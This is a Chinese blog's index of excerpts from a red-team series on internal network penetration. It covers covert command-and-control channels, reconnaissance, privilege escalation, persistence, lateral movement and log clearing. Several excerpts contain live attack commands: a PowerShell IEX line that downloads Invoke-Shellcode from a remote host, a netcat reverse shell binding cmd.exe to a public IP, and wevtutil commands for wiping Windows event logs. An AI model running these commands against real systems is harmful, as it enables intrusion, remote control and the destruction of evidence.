【内网渗透1】
【内网渗透1】
FLy_鹏程万里
国内网络安全研究员,专注于Web渗透、移动安全、代码审计、应急响应、内网渗透、区块链安全、云安全等研究方向,擅长渗透测试、红蓝对抗、内网渗透、云安全、区块链安全。
展开
-
【基础篇】————1、基础知识
前言最近想学习一波关于内网渗透的相关知识,但是自己在网上找了好久,发现并没有系统的学习内容,而且比较零散,所以个人打算通过理论结合实践的方式自学内网渗透的相关知识,并且将所学习的内容以及具体的实践操作方式记录下来,一方面为自己后面整理相关资料做参考,另一方面希望本系列内容对各位读者有帮助,帮助大家在内网渗透的道路上走的更远,更深!下面开始本系列的第一篇——基础知识讲解。内网&外网...原创 2019-05-03 17:46:29 · 834 阅读 · 0 评论 -
【基础篇】————18、隐匿攻击之WMI
Windows Management Instrumentation(WMI)是一项Microsoft技术,旨在允许管理员跨网络执行本地和远程管理操作。由于WMI是自Windows 98以来存在的Windows生态系统的一部分,因此无论是运行Windows 10还是Windows XP,它几乎可以在每个网络中使用。可以通过WMI执行的一些操作是:命令执行 文件传输 读取文件和注册表项 文...翻译 2019-05-26 19:07:50 · 1330 阅读 · 0 评论 -
【基础篇】————19、隐匿攻击之WebSocket
在探索可以在红队参与期间使用的日常新方法和工具中特别关注命令和控制通道,这些通道可以逃避安全产品,并可以通过使用非传统方法隐藏流量。Arno0x0x发现某些Web网关不检查Web套接字内容。因此,它可以用作向主机执行任意命令的通信通道。Arno0x0x开发了一个实现此方法的命令和控制工具(WSC2)。该工具是用python编写的,可以用于数据泄露,因为它提供了文件传输功能和shell功能。...翻译 2019-05-26 19:20:12 · 906 阅读 · 0 评论 -
【基础篇】————20、隐匿攻击之Images
迈克尔·斯科特开发了一个python脚本,可以生成一个图标图像,并将PowerShell命令嵌入到该图像中。第一步是将命令写入文本文件。echo 'IEX((new-object net.webclient).downloadstring("http://192.168.1.171/tmp/Invoke-Shellcode.ps1"));Invoke-Shellcode -payload ...翻译 2019-05-26 19:31:01 · 576 阅读 · 0 评论 -
【基础篇】————21、隐匿攻击之Web Interface
红队评估的高要求使得安全公司和安全顾问对有不同功能的命令和控制工具的开发工具产生了极大的兴趣。其中一些工具可用于官方活动,而其他一些工具仅用于研究目的。Ares是一个用Python编写的命令和控制工具,由Kevin Locati开发。它有一个在8080端口上运行的Web界面,它受密码和密码保护。必须在运行服务器之前创建数据库。./ares.py initdb./ares.py runs...翻译 2019-05-26 19:39:54 · 824 阅读 · 0 评论 -
【基础篇】————21、隐匿攻击之JavaScript
有一些命令和控制工具可以使用各种fof方法来隐藏恶意流量或以各种格式执行植入。Casey Smith最初开发了一个原型工具,它使用JavaScript作为有效载荷,并连接回监听Web服务器。一位安全研究人员3gstudent扩展了Casey Smith的工作,并在PowerShell中开发了JSRat,它提供了一些额外的功能。此工具的其他变体存在于Python中,因此主控主机可以是Linux机器或...翻译 2019-05-26 19:49:50 · 478 阅读 · 0 评论 -
【基础篇】————22、隐匿攻击之Domain Fronting
0x01 简介最近看到了一些关于Domain Fronting的技术,感觉很有意思,其特点在于,你真正访问的域名并不是你看到的域名,即可以隐藏攻击者的真实地址,并且此技术能够让我们在一些受限制的网络中依然连接到我们的C2服务器,其关键思想是在不同的通信层使用不同的域名,在HTTP(S)请求中,目标域名通常显示在三个关键位置:DNS查询,TLS(SNI)拓展及HTTP主机头中,通常,这三个地方都...转载 2019-05-27 14:41:26 · 1601 阅读 · 0 评论 -
【基础篇】————23、隐匿攻击之Tor Fronting
0x01 简介学习完Domain Fronting之后,又从@vysecurity的文章里学会了一个新的姿势–Tor Fronting,使用Tor Fronting同样能在攻击中隐藏自己,并且更加容易实现,此文就来介绍一下这个新的姿势。0x02 Tor Hidden ServicesTor是互联网上用于保护您隐私最有力的工具之一,而Tor Hidden Services则是为了隐藏自...转载 2019-05-27 14:54:07 · 1171 阅读 · 0 评论 -
【基础篇】————24、内网跨边界应用
0x01 端口转发NC端口转发nc使用方法:a、反向连接在公网主机上进行监听:nc -lvp 4444在内网主机上执行:nc -t -e cmd.exe 公网主机ip 4444上述命令中 -t 参数是指通过telnet模式执行cmd.exe,可省略,成功后即可得到一个内网主机的cmd shell。b、正向连接远程主机上执行:nc -l -...原创 2019-05-27 16:46:53 · 1021 阅读 · 0 评论 -
【基础篇】————25、内网信息收集
0x01 本机信息收集1、用户列表windows用户列表、分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户2、进程列表分析杀毒软件/安全监控工具等邮件客户端 VPN ftp等3、服务列表与安全防范工具有关服务[判断是否可以手动开关等] 存在问题的服务[权限/漏洞]4、端口列表开放端口对应的常见服务/应用程序[匿名/权限/漏洞等] 利用端口进行信息收集5、...原创 2019-05-27 16:58:28 · 478 阅读 · 0 评论 -
【基础篇】————26、权限提升
0x00 Windows1、BypassUAC常用方法使用IFileOperation COM接口 使用Wusa.exe的extract选项 远程注入SHELLCODE 到傀儡进程 DLL劫持,劫持系统的DLL文件 eventvwr.exe and registry hijacking sdclt.exe SilentCleanup wscript.exe cmstp....原创 2019-05-27 17:05:35 · 425 阅读 · 0 评论 -
【基础篇】————27、权限维持
0x01 系统后门Windows1、密码记录工具WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。 键盘记录器 安装键盘记录的目...转载 2019-05-27 17:19:25 · 913 阅读 · 0 评论 -
【基础篇】————28、横向渗透
0x00 端口渗透端口扫描端口的指纹信息(版本信息) 端口所对应运行的服务 常见的默认端口号 .尝试弱口令端口爆破 hydra端口弱口令NTScan Hscan 自写脚本端口溢出smbms08067 ms17010 ms11058 ...apacheftp...常见的默认端口1、web类(web漏洞/敏感目录)第三方通用组...转载 2019-05-27 17:37:00 · 2803 阅读 · 0 评论 -
【基础篇】————17、隐匿攻击之Website
通过合法流量覆盖任意命令是每个红队入侵的必要条件。大多数命令和控制工具正在实施一种秘密技术,它允许红队隐藏他们的活动,因为数据泄露是目标的一部分。David Kennedy开发了一个名为TrevorC2的命令和控制工具,可用于通过合法的HTTP流量执行命令。需要将trevorc2_server.py上的URL属性修改为所选的网站。 ...翻译 2019-05-26 18:57:42 · 646 阅读 · 0 评论 -
【基础篇】————16、隐匿攻击之Kernel
现代环境实施不同级别的安全控制,如端点解决方案,主机入侵防御系统,防火墙和实时事件日志分析。另一方面,红队参与试图逃避这些控制,以避免被发现。但是,大多数工具会通过生成各种事件日志在网络级别或主机级别上产生某种噪声。RJ Mcdown和约书亚THEIMER已经发布了一个工具叫redsails中间DerbyCon2017年,其宗旨是让红队无需创建任何事件日志或建立新连接执行目标主机上的命令。这...翻译 2019-05-26 18:50:58 · 551 阅读 · 0 评论 -
【基础篇】————15、隐匿攻击之Https
C2工具通常依赖于各种协议作为通信机制,如DNS,ICMP,HTTPS等。大多数端点产品执行一些深度数据包检查,以便丢弃任意连接。使用支持加密的协议并使用证书固定生成的流量可以规避大部分产品,并且应该将其视为红队参与过程中的一种方法。ThunderShell由MrUn1k0d3r开发,基于Python。它使用Redis服务器在植入物和服务器之间进行HTTPS通信,并使用PowerShell在目...翻译 2019-05-26 18:39:08 · 580 阅读 · 0 评论 -
【基础篇】————2、信息收集
前言所谓的内网渗透其实就是在获取到内网的访问权限之后进一步对内网进行渗透测试的过程,所以在内网渗透测试过程中我们也少不了在常规的web渗透测试中常用的方法和流程。信息收集渗透测试的本质是信息收集,信息收集的好坏将决定渗透测试的效果,下面简单的介绍一下内网渗透中信息收集的方法和途径。A、开源情报收集(OSINT)Github:Github_Nuggests(自动爬取Githu...原创 2019-05-03 17:47:23 · 660 阅读 · 0 评论 -
【基础篇】————3、进入内网
要想进行内网渗透,我们的前提是要获取内网的访问权限,那么如何获取内网的访问权限呢?基于企业弱账号漏洞VPN(通过邮箱,密码爆破,社工等途径获取VPN) 企业相关运维系统(zabbix等)基于系统漏洞进入Metasploit(漏洞利用框架) 漏洞利用脚本网站应用程序渗透SQL注入 跨站脚本(XSS) 跨站请求伪造(CSRF) SSRF 功能/业务逻辑漏洞 其他漏洞等...原创 2019-05-26 18:27:32 · 866 阅读 · 0 评论 -
【基础篇】————4、隐匿攻击之ICMP
隐匿攻击之ICMP内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。这是一种古老的技术,在有限的环境中大多数时候都使用它来接收shell,但现在随着红队交战的蔓延,它可以作为另一种方法,通过使用ICMP流...翻译 2019-05-26 18:28:11 · 785 阅读 · 0 评论 -
【基础篇】————5、隐匿攻击之DNS
隐匿攻击之DNS即使在最受限制的环境中,也应该允许DNS流量解析内部或外部域。这可以用作目标主机和命令和控制服务器之间的通信通道。命令和数据包含在DNS查询和响应中,因此很难检测,因为任意命令隐藏在合法流量中。使用Dnscat2可以实现这种技术,Dnscat2可以通过DNS协议创建命令和控制通道。此工具使用基于C的客户端(植入),它需要在目标上执行,以便服务器接收连接。流量以加密形式传输,...翻译 2019-05-26 18:28:53 · 761 阅读 · 0 评论 -
【基础篇】————6、隐匿攻击之DropBox
许多公司使用DropBox作为共享工具和托管数据。因此,对DropBox服务器的流量被限制或归类为恶意域是不常见的。但是,有可能滥用DropBox的功能并将其用作命令和控制工具。这可以通过DropBoxC2工具实现,该工具使用DropBox API在控制器和植入物之间进行通信,因为它完全在内存中运行并且流量被加密,所以它是隐秘的。DropboxC2控制器的安装简单快捷。git clo...翻译 2019-05-26 18:29:09 · 707 阅读 · 0 评论 -
【基础篇】————7、隐匿攻击之Gmail
Gmail为用户和企业提供电子邮件功能。这意味着允许大多数组织中的Gmail服务器流量。来自另一方的红队操作需要尽可能隐蔽,因此使用ICMP和SMTP等合法协议来执行命令到受感染的主机是必不可少的。为此,Web Gcat和Gdog上有两个重要的工具,它们都可以使用Gmail作为命令和控制服务器。GcatGcat是基于python的框架,它使用Gmail来执行命令和控制服务器。Gcat中包...翻译 2019-05-26 18:29:16 · 605 阅读 · 0 评论 -
【基础篇】————8、隐匿攻击之Telegram
0x00 前言在Github上,涉及到将社交网络作为C2 server(可理解为命令控制服务器)的poc项目越来越多,如利用gmail的gcat、gdog,利用twitter的twittor、以及利用Telegram的Blaze Telegram Backdoor Toolkit (bt2),使用这类方法的好处不仅仅是因为社交网络的服务器稳定,更多的原因在于其通信可以隐藏在正常流量中,不易被发...翻译 2019-05-26 18:29:24 · 2073 阅读 · 0 评论 -
【基础篇】————9、隐匿攻击之Twitter
社交媒体网络是公司营销团队的一个很好的工具。如果使用得当,他们往往会吸引新的业务。因此,几乎不可能将流量阻塞到Twitter和Facebook等社交媒体平台。它可以用于测试的优点是因为有各种命令和控制工具可以隐藏他们在社交媒体网络流量背后的活动。使用Twitter的一个公知的命令和控制工具叫做Twittor。这个工具是由Paul Amar开发的,它基于Gcat的概念,它使用Gmail作为命令和...翻译 2019-05-26 18:29:32 · 371 阅读 · 0 评论 -
【基础篇】————10、隐匿攻击之Website Keyword
有各种命令和控制选项,其中一些使用ICMP和DNS等协议以及其他一些合法网站,如DropBox和Gmail。在DerbyCon 3.0期间,Matt Graeber和Chris Campbell介绍了一种使用网站关键字的技术,以便在系统中触发shellcode的发布。Matt Nelson制作了一个PowerShell脚本,该脚本使用相同的技术来获得Meterpreter会话并使用其作为...翻译 2019-05-26 18:29:38 · 487 阅读 · 0 评论 -
【基础篇】————11、隐匿攻击之PowerShell
许多工具都是用PowerShell编写的,特别是对于红队团队的活动,因为大多数现代Windows都有PowerShell,而且管理员通常不会限制普通用户访问PowerShell控制台。这给攻击者带来了很大的好处,特别是如果蓝色团队不监视PowerShell使用情况。来自Nettitude Labs和Dave Hardy的Ben Turner创建了一个基于PowerShell和C#的命令和控制工...翻译 2019-05-26 18:29:45 · 760 阅读 · 0 评论 -
【基础篇】————12、隐匿攻击之Windows COM
红队之间的合作越来越受欢迎,系统管理员也越来越了解工具和技术,因此避免检测是一项艰巨的任务。另一方面,红队一直在寻找使用合法流量或Windows标准功能来隐藏其活动的命令和控制工具。本机Windows脚本宿主引擎可用作另一种命令和控制方法,在2017年拉斯维加斯Bsides展出,并发布了一个工具来协助此活动。Koadic Framework由Sean Dillon和Zach Harding...翻译 2019-05-26 18:29:53 · 411 阅读 · 0 评论 -
【基础篇】————13、隐匿攻击之WebDAV
WebDAV是用于Web内容创作操作的HTTP协议的扩展。该协议的一些优点可以在红色团队中使用,因为它是代理感知和隐秘的,因为连接到WebDAV服务器的请求看起来像是通过SvCHOST进程从操作系统本身来的。PROPFIND方法用于检索存储在WebDAV服务器中的资源的属性。这些属性可以包括文件名,内容长度,创建和修改日期等。Arno0x0x发现可以通过PROPFIND响应传递有效负载,方...翻译 2019-05-26 18:30:01 · 1082 阅读 · 0 评论 -
【基础篇】————14、隐匿攻击之Office 365
前言在定制化、创新化命令与控制(C2,Command and Control)通道方面,人们已经做了许多研究工作,然而已公开的研究成果通常只是独立的理论概念,没有集成到现有的攻击工具包中。Cobalt Strike最近添加了一个新的扩展功能,可以在保持工具兼容性的前提下,创造隐蔽的C2通道。Cobalt Strike新添加的扩展名为“External C2”,为了最大化挖掘该扩展的潜能,MW...转载 2019-05-26 18:30:10 · 772 阅读 · 0 评论 -
【基础篇】————29、痕迹清理
Windows日志清除获取日志分类列表:wevtutil el >1.txt获取单个日志类别的统计信息:wevtutil gli "windows powershell"回显:creationTime: 2016-11-28T06:01:37.986ZlastAccessTime: 2016-11-28T06:01:37.986ZlastWriteTim...转载 2019-05-27 17:39:06 · 434 阅读 · 0 评论